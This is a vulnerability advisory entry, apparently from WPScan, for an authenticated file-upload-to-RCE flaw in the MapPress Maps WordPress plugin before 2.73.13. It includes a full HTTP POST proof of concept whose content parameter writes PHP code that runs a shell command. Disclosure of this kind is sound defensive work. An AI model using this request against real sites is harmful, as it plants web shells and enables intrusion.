WordPress Plugin Vulnerabilities
MapPress Maps for WordPress < 2.73.13 - Admin+ File Upload to Remote Code Execution
Description
The plugin allows a high privileged user to bypass the DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS settings and upload arbitrary files to the site through the "ajax_save" function. The file is written relative to the current theme's stylesheet directory, and a .php file extension is added. No validation is performed on the content of the file, triggering an RCE vulnerability by uploading a web shell. Further the name parameter is not sanitized, allowing the payload to be uploaded to any directory to which the server has write access.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Length: 329 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://localhost:8000/wp-admin/admin.php?page=mappress_maps Accept-Encoding: gzip, deflate Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: [admin+] action=mapp_tpl_save&mapdata=%7B%22center%22%3Anull%2C%22height%22%3Anull%2C%22mapid%22%3Anull%2C%22mapTypeId%22%3Anull%2C%22metaKey%22%3Anull%2C%22pois%22%3A%5B%5D%2C%22postid%22%3A0%2C%22search%22%3Anull%2C%22title%22%3Anull%2C%22width%22%3Anull%2C%22zoom%22%3Anull%7D&nonce=9fe04b45b4&name=zero.cgi&content=<?php+echo(`ls`);?>
Affects Plugins
Fixed in 2.73.13 References
CVE
Miscellaneous
Original Researcher
qerogram
Submitter
qerogram
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-14 (about 2 years ago)
Added
2022-03-14 (about 2 years ago)
Last Updated
2022-04-17 (about 2 years ago)
WPScan 